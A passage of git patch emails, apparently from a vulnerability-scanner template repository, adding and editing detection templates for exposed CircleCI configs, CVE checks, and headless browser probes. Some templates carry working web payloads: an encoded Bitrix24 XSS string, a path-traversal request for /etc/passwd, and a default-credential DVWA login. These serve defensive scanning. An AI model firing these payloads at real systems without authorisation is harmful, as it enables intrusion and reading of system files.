1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-config.yaml diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml new file mode 100644 index 0000000000..bd3b8c8df1 --- /dev/null +++ b/exposures/configs/circleci-config.yaml @@ -0,0 +1,25 @@ +id: circleci-config + +info: + name: circleci config.yml exposure + author: geeknik + severity: medium + reference: https://circleci.com/docs/2.0/sample-config/ + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/config.yml" + - "{{BaseURL}}/.circleci/config.yml" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "jobs:") == true' + + - type: status + status: + - 200 From 223d3903886167c1c3cb7190bdbfeb22e222d8d5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:15:59 +0000 Subject: [PATCH 326/370] Update circleci-config.yaml Changing severity from medium to low. --- exposures/configs/circleci-config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index bd3b8c8df1..4c5593a45a 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -3,7 +3,7 @@ id: circleci-config info: name: circleci config.yml exposure author: geeknik - severity: medium + severity: low reference: https://circleci.com/docs/2.0/sample-config/ requests: From 0bfb348b744173a0eb11ed6786786f70467fbaf5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:04 +0000 Subject: [PATCH 327/370] Create circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-ssh-config.yaml diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml new file mode 100644 index 0000000000..59e81e5ea9 --- /dev/null +++ b/exposures/configs/circleci-ssh-config.yaml @@ -0,0 +1,25 @@ +id: circleci-ssh-config + +info: + name: circleci ssh-config exposure + author: geeknik + severity: low + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/ssh-config" + + matchers-condition: and + matchers: + - type: word + words: + - "Host" + - "HostName" + - "IdentityFile" + + - type: status + status: + - 200 From 70f3204d5390099cbde5786558f69afc6821186d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:35 +0000 Subject: [PATCH 328/370] Update circleci-config.yaml --- exposures/configs/circleci-config.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index 4c5593a45a..294bb13505 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -11,7 +11,6 @@ requests: redirects: true max-redirects: 3 path: - - "{{BaseURL}}/config.yml" - "{{BaseURL}}/.circleci/config.yml" matchers-condition: and From 3b84ceb10d5628eed18ade5a228c894c87204768 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Mar 2021 02:53:48 +0000 Subject: [PATCH 329/370] Create CVE-2020-13483.yaml --- cves/2020/CVE-2020-13483.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-13483.yaml diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml new file mode 100644 index 0000000000..24421360de --- /dev/null +++ b/cves/2020/CVE-2020-13483.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-13483 + +info: + name: Bitrix24 through 20.0.0 allows XSS + author: pikpikcu + severity: high + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13483 + tags: cve,cve2020,xss,bitrix + +requests: + - method: GET + path: + - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - "{alert(document.domain);}" + part: body + condition: and + + - type: status + status: + - 200 From 31af91e891652cd09d61df5ac7df84f6e495eda0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 09:20:21 +0200 Subject: [PATCH 330/370] More reference from comment to parameter --- cves/2020/CVE-2020-1147.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-1147.yaml b/cves/2020/CVE-2020-1147.yaml index 518475c483..05b1fc0801 100644 --- a/cves/2020/CVE-2020-1147.yaml +++ b/cves/2020/CVE-2020-1147.yaml @@ -5,10 +5,9 @@ info: author: dwisiswant0 severity: critical tags: cve,cve2020,sharepoint,iis,rce - - # Ref: - # - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147 - # - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html + reference: + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147 + - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html requests: - method: GET From 4bcb6fbc043ed0640fb5537c0965dcb219531bf4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 14:03:40 +0530 Subject: [PATCH 331/370] Adding headless templates --- headless/dvwa-headless-automatic-login.yaml | 43 ++++++++++ headless/postmessage-tracker.yaml | 65 ++++++++++++++ headless/prototype-pollution-check.yaml | 95 +++++++++++++++++++++ headless/window-name-domxss.yaml | 81 ++++++++++++++++++ 4 files changed, 284 insertions(+) create mode 100644 headless/dvwa-headless-automatic-login.yaml create mode 100644 headless/postmessage-tracker.yaml create mode 100644 headless/prototype-pollution-check.yaml create mode 100644 headless/window-name-domxss.yaml diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml new file mode 100644 index 0000000000..41c3aa808e --- /dev/null +++ b/headless/dvwa-headless-automatic-login.yaml @@ -0,0 +1,43 @@ +id: dvwa-headless-automatic-login +info: + name: DVWA Headless Automatic Login + author: pdteam + severity: high + tags: headlress + +headless: + - steps: + - args: + url: "{{BaseURL}}/login.php" + action: navigate + - action: waitload + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input + action: click + - action: waitload + - args: + by: x + value: admin + xpath: /html/body/div/div[2]/form/fieldset/input + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: click + - action: waitload + - args: + by: x + value: password + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/p/input + action: click + - action: waitload + matchers: + - part: resp + type: word + words: + - "You have logged in as" diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml new file mode 100644 index 0000000000..4b2f3b1b2c --- /dev/null +++ b/headless/postmessage-tracker.yaml @@ -0,0 +1,65 @@ +id: postmessage-tracker + +info: + name: Postmessage Tracker + author: pd-team + severity: info + reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js + tags: headless,postmessage + +headless: + - steps: + - action: setheader + args: + part: response + key: Content-Security-Policy + value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" + - action: script + args: + hook: true + code: | + (function() {window.alerts = []; + + function logger(found) { + window.alerts.push(found); + } + + function getStackTrace () { + var stack; + try { + throw new Error(''); + } + catch (error) { + stack = error.stack || ''; + } + stack = stack.split('\n').map(function (line) { return line.trim(); }); + return stack.splice(stack[0] == 'Error' ? 2 : 1); + } + + var oldListener = Window.prototype.addEventListener; + + Window.prototype.addEventListener = function(type, listener, useCapture) { + if(type === 'message') { + logger(getStackTrace()); + } + return oldListener.apply(this, arguments); + }; + })(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "at Window.addEventListener" + extractors: + - type: kval + part: alerts + kval: + - alerts diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml new file mode 100644 index 0000000000..4bfeefe12d --- /dev/null +++ b/headless/prototype-pollution-check.yaml @@ -0,0 +1,95 @@ +id: prototype-pollution-check + +info: + name: Prototype Pollution Check + author: pd-team + severity: medium + reference: https://github.com/msrkp/PPScan + tags: headless +headless: + - steps: + - action: setheader + args: + part: response + key: Content-Security-Policy + value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" + - action: setheader + args: + part: response + key: X-Frame-Options + value: foo + - action: setheader + args: + part: response + key: If-None-Match + value: foo + - action: script + args: + hook: true + code: | + // Hooking code adapted from https://github.com/msrkp/PPScan/blob/main/scripts/content_script.js + (function() {window.alerts = []; + + function logger(found) { + window.alerts.push(found); + } + + function check() { + loc = location.href; + + if (loc.indexOf("e32a5ec9c99") >= 0 && loc.search("a0def12bce") == -1) { + setTimeout(function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") { + logger(location.href); + } + var url = new URL(location.origin + location.pathname); + url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy"; + location = url.href; + }, 5 * 1000); + } else if (loc.search("a0def12bce") != -1) { + setTimeout(function() { + if (Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + } + window.close(); + }, 5 * 1000); + } else { + var url = new URL(loc); + url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60"); + url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60"); + location = url.href; + } + } + + window.onload = function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + } else { + check(); + } + }; + + var timerID = setInterval(function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + clearInterval(timerID); + } + }, 5 * 1000)})(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "__proto__" + extractors: + - type: kval + part: alerts + kval: + - alerts diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml new file mode 100644 index 0000000000..f7c356fc2d --- /dev/null +++ b/headless/window-name-domxss.yaml @@ -0,0 +1,81 @@ +id: window-name-domxss + +info: + name: window.name DOM XSS + author: pd-team + severity: medium + reference: https://public-firing-range.appspot.com/dom/index.html + tags: headless,xss,domxss + +headless: + - steps: + - action: setheader + args: + part: response + key: Content-Security-Policy + value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" + - action: script + args: + hook: true + code: | + (function() {window.alerts = []; + + function logger(found) { + window.alerts.push(found); + } + + function getStackTrace () { + var stack; + try { + throw new Error(''); + } + catch (error) { + stack = error.stack || ''; + } + stack = stack.split('\n').map(function (line) { return line.trim(); }); + return stack.splice(stack[0] == 'Error' ? 2 : 1); + } + window.name = "{{randstr_1}}'\"<>"; + + var oldEval = eval; + var oldDocumentWrite = document.write; + var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set; + Object.defineProperty(Element.prototype, 'innerHTML', { + set: function innerHTML_Setter(val) { + if (val.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()}); + } + return setter.call(this, val) + } + }); + eval = function(data) { + if (data.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()}); + } + return oldEval.apply(this, arguments); + }; + document.write = function(data) { + if (data.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()}); + } + return oldEval.apply(this, arguments); + }; + })(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "sink:" + extractors: + - type: kval + part: alerts + kval: + - alerts From e810128b5cf76380652a165885d245c18af66e6e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 08:34:21 +0000 Subject: [PATCH 332/370] Auto Update README [Wed Mar 10 08:34:21 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index edec0ebcaf..cac185f548 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 699 files**. +**73 directories, 703 files**. From 37933fb2afc2ec9d92f87383675fb0dd65e71504 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 14:19:10 +0530 Subject: [PATCH 333/370] Update CVE-2020-13483.yaml --- cves/2020/CVE-2020-13483.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index 24421360de..adfc63a244 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -19,7 +19,11 @@ requests: words: - "{alert(document.domain);}" part: body - condition: and + + - type: word + words: + - text/html + part: header - type: status status: From 686d031c845f076131048100750a08a73ab21804 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:52:33 +0700 Subject: [PATCH 334/370] Update matcher --- cves/2016/CVE-2016-7552.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 22dbf4829f..cd7b3eef98 100644 --- a/cves/2016/CVE-2016-7552.yaml +++ b/cves/2016/CVE-2016-7552.yaml @@ -23,5 +23,5 @@ requests: - 200 - type: word words: - - "Backtrace" - part: header + - "Memory map" + part: body From 7085d1fd8b15080f1aabd6b1ee8f517405e7ec50 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 14:23:44 +0530 Subject: [PATCH 335/370] Update CVE-2019-8451.yaml --- cves/2019/CVE-2019-8451.yaml | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 54a7b11741..ee062317bc 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -7,17 +7,6 @@ info: reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in tags: cve,cve2019,atlassian,jira,ssrf -# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important -# security issue reported in August 2019. - -# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in -# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. -# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable -# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal -# network resources. -# https://twitter.com/benmontour/status/1177250393220239360 -# https://twitter.com/ojensen5115/status/1176569607357730817 - requests: - method: GET path: From d9895889060520fad31fdf8b460b329f3d123561 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 08:55:11 +0000 Subject: [PATCH 336/370] Auto Update README [Wed Mar 10 08:55:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fd859f3c48..ad7ccf8586 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 234 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 700 files**. +**72 directories, 701 files**. From f20adaf50486dd2c153d03733d123cbc68fbdd29 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Mar 2021 09:18:54 +0000 Subject: [PATCH 337/370] Update CVE-2008-2650.yaml --- cves/2008/CVE-2008-2650.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index aa427af7be..68b9e4ba42 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -9,6 +9,7 @@ requests: - raw: - | GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and From 0316d8a0faf5dd71481b21a9f99e7037901f7164 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 16:11:33 +0530 Subject: [PATCH 338/370] typo --- headless/dvwa-headless-automatic-login.yaml | 2 +- headless/prototype-pollution-check.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml index 41c3aa808e..0c508c095a 100644 --- a/headless/dvwa-headless-automatic-login.yaml +++ b/headless/dvwa-headless-automatic-login.yaml @@ -3,7 +3,7 @@ info: name: DVWA Headless Automatic Login author: pdteam severity: high - tags: headlress + tags: headless headless: - steps: diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index 4bfeefe12d..0e219f5eac 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://github.com/msrkp/PPScan tags: headless + headless: - steps: - action: setheader From 03ed1f9346580af9860a53691cca93a448e8c475 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 12:53:21 +0200 Subject: [PATCH 339/370] Add description --- cves/2020/CVE-2020-2096.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 4059712193..742f8a980f 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -4,6 +4,7 @@ info: name: Jenkins Gitlab Hook XSS author: madrobot severity: medium + description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability. tags: cve,cve2020,jenkins,xss requests: From ab841834ad9e29e0b48a8a0cdd4f2d1d5a75228b Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 12:54:13 +0200 Subject: [PATCH 340/370] Add description --- cves/2020/CVE-2020-0618.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml index c7880a7724..bb4fd57359 100644 --- a/cves/2020/CVE-2020-0618.yaml +++ b/cves/2020/CVE-2020-0618.yaml @@ -3,6 +3,7 @@ id: CVE-2020-0618 info: name: RCE in SQL Server Reporting Services author: joeldeleep + description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'. severity: high reference: https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ tags: cve,cve2020,rce From c6b559faa88237e0103014ae322e73d94cfd5f9d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:22:37 +0200 Subject: [PATCH 341/370] Add description --- cves/2020/CVE-2020-1147.yaml | 1 + cves/2020/CVE-2020-1943.yaml | 1 + cves/2020/CVE-2020-2036.yaml | 2 ++ 3 files changed, 4 insertions(+) diff --git a/cves/2020/CVE-2020-1147.yaml b/cves/2020/CVE-2020-1147.yaml index 05b1fc0801..a21e9184de 100644 --- a/cves/2020/CVE-2020-1147.yaml +++ b/cves/2020/CVE-2020-1147.yaml @@ -3,6 +3,7 @@ id: CVE-2020-1147 info: name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection author: dwisiswant0 + description: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'. severity: critical tags: cve,cve2020,sharepoint,iis,rce reference: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 33eb610341..ea8fd33790 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -3,6 +3,7 @@ id: CVE-2020-1943 info: name: Apache OFBiz Reflected XSS author: pd-team + description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07. severity: medium tags: cve,cve2020,apache,xss diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 1cbc1e58aa..707e6c5343 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -3,6 +3,8 @@ info: name: Palo Alto Networks Reflected XSS author: madrobot severity: medium + description: > + A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ tags: cve,cve2020,vpn,xss From da7aa8ca8faa66981d60084467f82b988148e2df Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:31:41 +0200 Subject: [PATCH 342/370] Missing references --- cves/2020/CVE-2020-2096.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 742f8a980f..2b4015e074 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -5,6 +5,10 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability. + reference: + - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 + - http://www.openwall.com/lists/oss-security/2020/01/15/1 + - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html tags: cve,cve2020,jenkins,xss requests: From eb1d4c2913602bb9b351223d521a778764d54823 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:33:16 +0200 Subject: [PATCH 343/370] Better reference (CVE information is redudant as it appears in the ID of the test) --- cves/2020/CVE-2020-2140.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 93832ed4d3..2a9a5c5066 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -4,7 +4,7 @@ info: name: Jenkin AuditTrailPlugin XSS severity: medium description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-2140 + reference: https://www.jenkins.io/security/advisory/2020-03-09/ tags: cve,cve2020,jenkins,xss requests: From c0c3c3d1ecfb4dc8979c68e48bbd4aa1e6c807ff Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:34:11 +0200 Subject: [PATCH 344/370] Name of the plugin is 'Audit Trail Plugin' --- cves/2020/CVE-2020-2140.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 2a9a5c5066..69eb751280 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -1,7 +1,7 @@ id: CVE-2020-2140 info: author: j3ssie/geraldino2 - name: Jenkin AuditTrailPlugin XSS + name: Jenkin Audit Trail Plugin XSS severity: medium description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: https://www.jenkins.io/security/advisory/2020-03-09/ From d6c3028f60f9031a4bf02a188a5059258cc32eb7 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:49:34 +0200 Subject: [PATCH 345/370] Spelling mistake --- cves/2021/CVE-2021-21978.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index 1898303c2e..396c5b2fbc 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -41,4 +41,4 @@ requests: part: body - type: dsl dsl: - - "len(body) == 28" # lenght of "\nFile uploaded successfully." \ No newline at end of file + - "len(body) == 28" # length of "\nFile uploaded successfully." \ No newline at end of file From 298bbe4b5c7d70e0514c9236f5622d43e312c221 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 18:36:50 +0530 Subject: [PATCH 346/370] Update CVE-2020-2096.yaml --- cves/2020/CVE-2020-2096.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 2b4015e074..7a5e9b010c 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability. - reference: + reference: - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html From 7b9f9cb03c338fac48ddde6505443a2237593fd7 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 20:27:04 +0700 Subject: [PATCH 347/370] :hammer: Only trigger by master branch --- .github/workflows/update-readme.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index f8e4c0c485..6dd5d6354e 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml @@ -11,7 +11,7 @@ on: jobs: build: runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' + if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' steps: - name: Install tree run: sudo apt-get install tree -y From 37eb31b8ccdb1545293358f8ba5eda2a6021a156 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:36:56 +0200 Subject: [PATCH 348/370] =?UTF-8?q?=E2=80=93=20instead=20of=20-?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020–26073.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index 3b06a803ef..2c2fab40c1 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ b/cves/2020/CVE-2020–26073.yaml @@ -3,7 +3,7 @@ info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 tags: Directory Traversal requests: From 99b468a720b7a7351da9ba237b96842fcca27959 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:37:53 +0200 Subject: [PATCH 349/370] Make the information more informative --- cves/2020/CVE-2020–26073.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index 2c2fab40c1..b6c4926400 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ 